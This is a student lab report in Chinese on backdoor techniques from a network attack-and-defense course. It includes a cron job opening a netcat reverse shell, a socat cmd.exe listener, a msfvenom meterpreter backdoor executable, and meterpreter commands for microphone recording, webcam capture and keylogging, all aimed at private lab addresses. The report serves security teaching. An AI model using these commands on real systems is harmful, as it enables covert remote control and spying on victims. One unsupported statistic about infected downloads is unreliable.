1. 程式人生 > 其它 >20192429馬一 2021-2022-2 《網路與系統攻防》實驗二 後門原理與實踐

20192429馬一 2021-2022-2 《網路與系統攻防》實驗二 後門原理與實踐

20192429馬一 2021-2022-2 《網路與系統攻防》實驗二 後門原理與實踐

目錄

一、實踐目標

  1. 使用netcat獲取主機操作Shell,cron啟動某項任務
  2. 使用socat獲取主機操作Shell, 任務計劃啟動
  3. 使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
  4. 使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
  5. 使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。

二、實踐原理與具體步驟

2.1 netcat獲取主機shell

  • netcat是一個底層工具,常與其他工具結合使用,起到後門的效果

2.1.1 win為攻擊機 kali為靶機

  • 輸入 ipconfig 查詢windows主機的ip地址為: 192.168.10.4

  • windows中,在ncat.exe檔案目錄下輸入 ncat.exe -l -p 5310 啟動監聽

  • 在kali中反彈連結,Windows即可獲取kali的shell

2.1.2 kali為攻擊機 win為靶機

  • 輸入** ifconfig** 查詢kali主機的IP地址為: 192.168.31.133

  • 在kali中輸入 nc -l -p 5310 開始監聽

  • Windows反彈連結kali,即可獲取Windows的shell

2.1.3 cron啟動任務

21 * * * * /bin/netcat 192.168.31.133 5301 -e /bin/sh
該命令表示,在每小時的第21分鐘執行後面的命令


2.2 socat獲取主機shell

2.2.1 建立任務

  • 新建觸發器並起名,在 程式 選項中選擇 socat.exe 的路徑,新增引數:

tcp-listen:5301 exec:cmd.exe,pty,stderr

2.2.2 等待11:41時彈出任務框

2.2.3 使用kali獲取win的shell

socat tcp:192.168.31.133:5301
即可獲得Windows的shell


2.3 使用MSF 生成可執行檔案,利用ncat傳送主機並獲取shell

2.3.1 使用MSF生成可執行檔案

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.133 LPORT=5310 -f exe > 20192429_msfbackdoor.exe

2.3.2 將檔案傳輸到Windows中

  • 使用ncat讓靶機進入接收檔案模式,並在kali將檔案傳輸出去

2.3.3 MSF進入監聽

  • 輸入 msfconsole 進入MSF

use exploit/multi/handler 設定payload
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.133 設定ip
set LPORT 5310 設定埠
show options 檢視選項
exploit 進入監聽模式

  • 可以看到已經獲取了主機的shell

2.4 使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權

2.4.1 獲取音訊內容

record_mic

2.4.2 獲取攝像頭內容

webcam_snap

2.4.3 獲取擊鍵記錄

keyscan_start 開始記錄
keyscan_dump 讀取記錄

  • 此處提權失敗,綜合分析應該是windows系統UAC無法允許該程式通過,

2.5 使用MSF生成shellcode,注入並獲取shell

  • Payload是包含在你用於一次漏洞利用(exploit)中的ShellCode中的主要功能程式碼。因為Payload是包含在ShellCode中的,ShellCode是真正的被輸入到存在漏洞的程式中的,並且ShellCode負責把程式的流程最終轉移到你的Payload程式碼中。所以對於一個漏洞來說,ShellCode就是一個用於某個漏洞的二進位制程式碼框架,有了這個框架你可以在這個ShellCode中包含你需要的Payload來做一些事情。
  • pwn20192429檔案為32位檔案,可以找到合適的payload為:linux/x86/meterpreter/reverse_tcp
  • 通過檢視該payload的配置進行如下配置:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.31.133
set LPORT 4444
exploit

  • 可以在獲取到shell

三、回答問題

3.1 例舉你能想到的一個後門進入到你係統中的可能方式

  • 在非官方網站下載檔案或應用時,99.9%的連結都被做過病毒處理,或者下載例如360,qq等應用時都會捆綁很多軟體,而且令人痛恨得是,這些軟體往往很難刪除,而且裝入電腦後它們會自動改名,所以很難發覺,並拖慢電腦執行效率

3.2 例舉你知道的後門如何啟動起來(win及linux)的方式

  • 捆綁處理,例如將自動關機捆綁某個.exe檔案中,一旦開啟你的電腦就會關機。

3.3 Meterpreter有哪些給你映像深刻的功能

  • 可以獲取靶機的音訊、攝像頭、擊鍵記錄等功能。這些許可權往往在獲取前都需要得到管理員同意,但該程式通過後門越過許可權

3.4 如何發現自己有系統有沒有被安裝後門

  • 利用高階防毒軟體查殺;在資源管理器中查詢有無垃圾資源,或在程序管理器中檢視有無怪異程序

四、問題出現與處理

4.1 可執行檔案傳輸失敗

  • windows防火牆攔截了企圖獲取許可權的後門程式,需要我們手動允許該程式執行

4.2 提權失敗

  • 本方法參考該文在基礎提權操作的基礎上,使用 use exploit/windows/local/bypassuac_eventvw 進入繞過uac方法進一步提權,儘管打開了事件檢視器,但任然提取失敗,在查詢資料後仍得不到解決方法,但在此處將方法分享,我會繼續想辦法解決該問題。

五、實踐感想

  • 通過本次實踐,我深入瞭解了MSF的工作原理,同時加深了我對本門課程的興趣,投入到今後的新的內容中,同時我也意識到,網路安全的嚴重形勢刻不容緩,黑客技術讓我國的網路安全變得危險,我們要更加深入得學習網路攻防技術。